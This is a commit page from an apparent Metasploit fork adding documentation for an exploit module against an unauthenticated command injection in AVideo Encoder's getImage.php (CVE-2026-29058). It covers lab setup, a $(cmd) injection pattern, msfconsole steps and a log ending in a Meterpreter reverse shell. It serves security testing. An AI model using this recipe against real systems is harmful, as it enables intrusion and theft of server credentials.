adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add exploit for AVideo Encoder getImage.php command injection (CVE-2026-29058)

Browse Source 
Unauthenticated OS command injection via the base64Url parameter in
getImage.php. The URL is interpolated into an ffmpeg shell command
without escapeshellarg(), and FILTER_VALIDATE_URL does not block
shell metacharacters in the URL path.
This commit is contained in:
Valentin Lobstein
2026-03-06 21:28:39 +01:00
parent 59a1992214
commit dfe73bb4c5
2 changed files with 262 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/avideo_encoder_getimage_cmd_injection.md
+150
View File
@@ -0,0 +1,150 @@
## Vulnerable Application
This module exploits an unauthenticated OS command injection vulnerability in AVideo
Encoder's `getImage.php` endpoint.
**CVE ID:** CVE-2026-29058
**Affected Versions:** AVideo Encoder before version 7.0 (commit 78178d1)
### Vulnerability Overview
The `getImage.php` endpoint accepts a `base64Url` GET parameter which is base64-decoded and
passed through PHP's `FILTER_VALIDATE_URL`. The validated URL is then interpolated directly
into an ffmpeg shell command within double quotes, without any use of `escapeshellarg()` or
metacharacter filtering.
PHP's `FILTER_VALIDATE_URL` does not block shell metacharacters such as backticks or `$()`
in the URL path component. A crafted URL like `http://x/$(cmd)` passes validation and gets
interpolated into:
```
ffmpeg -i "http://x/$(cmd)" -f image2 ...
```
This results in arbitrary command execution as `www-data`. The Encoder code is served by the
main AVideo Apache container (mounted at `/Encoder`), so exploitation gives access to the
main application context including database credentials and configuration.
Fixed in AVideo Encoder version 7.0 (commit `78178d1`) which added `escapeshellarg()` and
shell metacharacter stripping.
### Setup
This lab reuses the same AVideo Docker environment as the `avideo_notify_ffmpeg_unauth_rce`
module, with one additional step: replacing the patched `getImage.php` with the pre-patch
(vulnerable) version.
1. Clone the AVideo repository and checkout the vulnerable commit:
```bash
cd /tmp
git clone https://github.com/WWBN/AVideo.git
cd AVideo
git checkout 596df4e5b0597c9806da76ebec5bbe3b305953e4
```
2. Create a `.env` file with the following configuration:
```bash
cat > .env << EOF
SERVER_NAME=localhost
CREATE_TLS_CERTIFICATE=yes
DB_MYSQL_HOST=database
DB_MYSQL_PORT=3306
DB_MYSQL_NAME=avideo
DB_MYSQL_USER=avideo
DB_MYSQL_PASSWORD=avideo
HTTP_PORT=80
HTTPS_PORT=9443
NETWORK_SUBNET=172.99.0.0/16
EOF
```
3. Fix MariaDB corrupted tc.log issue (required for first-time setup):
```bash
cat > deploy/docker-entrypoint-mariadb << 'SCRIPTEOF'
#!/bin/bash
set -e
if [ -f /var/lib/mysql/tc.log ]; then
MAGIC_HEADER=$(head -c 4 /var/lib/mysql/tc.log | od -An -tx1 | tr -d ' \n' 2>/dev/null || echo "")
if [ "$MAGIC_HEADER" != "01000000" ] && [ -n "$MAGIC_HEADER" ]; then
echo "[Entrypoint]: Removing corrupted tc.log file (bad magic header: $MAGIC_HEADER)"
rm -f /var/lib/mysql/tc.log
fi
fi
SCRIPTEOF
chmod +x deploy/docker-entrypoint-mariadb
cat >> Dockerfile.mariadb << 'DOCKERFILEEOF'
COPY deploy/docker-entrypoint-mariadb /usr/local/bin/docker-entrypoint-mariadb
RUN chmod +x /usr/local/bin/docker-entrypoint-mariadb
RUN sed -i '2i /usr/local/bin/docker-entrypoint-mariadb' /usr/local/bin/docker-entrypoint.sh
DOCKERFILEEOF
docker compose build database database_encoder
```
4. Start the Docker Compose environment:
```bash
docker compose up -d
```
5. Wait for the services to be ready and access the application at `http://localhost`.
6. Replace the Encoder's `getImage.php` with the pre-patch (vulnerable) version:
```bash
cd .compose/encoder
git checkout e0c2768 -- objects/getImage.php
cd ../..
docker compose restart avideo
```
After this step, the `/Encoder/objects/getImage.php` endpoint is vulnerable to command
injection via the `base64Url` parameter.
## Verification Steps
1. Start `msfconsole`
2. `use exploit/linux/http/avideo_encoder_getimage_cmd_injection`
3. `set RHOSTS <target_ip>`
4. `set RPORT <target_port>` (default: 80)
5. `set LHOST <your_ip>` (for reverse connection)
6. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
7. `set FETCH_SRVPORT <available_port>` (if default 8080 is taken)
8. `exploit`
9. **Verify** that you get a Meterpreter session
## Options
This module has no non-default options.
## Scenarios
### Meterpreter via fetch payload (cmd/linux/http/x64/meterpreter/reverse_tcp)
This scenario demonstrates exploitation against AVideo with a vulnerable Encoder, using a
fetch payload to deliver a Meterpreter binary:
```
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > set RHOSTS localhost
RHOSTS => localhost
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > set RPORT 80
RPORT => 80
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > set LHOST 172.99.0.1
LHOST => 172.99.0.1
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > exploit
[*] Started reverse TCP handler on 172.99.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Command injection confirmed via sleep timing (3/3 checks passed)
[*] Sending command injection via getImage.php...
[*] Sending stage (3090404 bytes) to 172.99.0.7
[*] Meterpreter session 1 opened (172.99.0.1:4444 -> 172.99.0.7:46970) at 2026-03-06 21:26:32 +0100
meterpreter >
```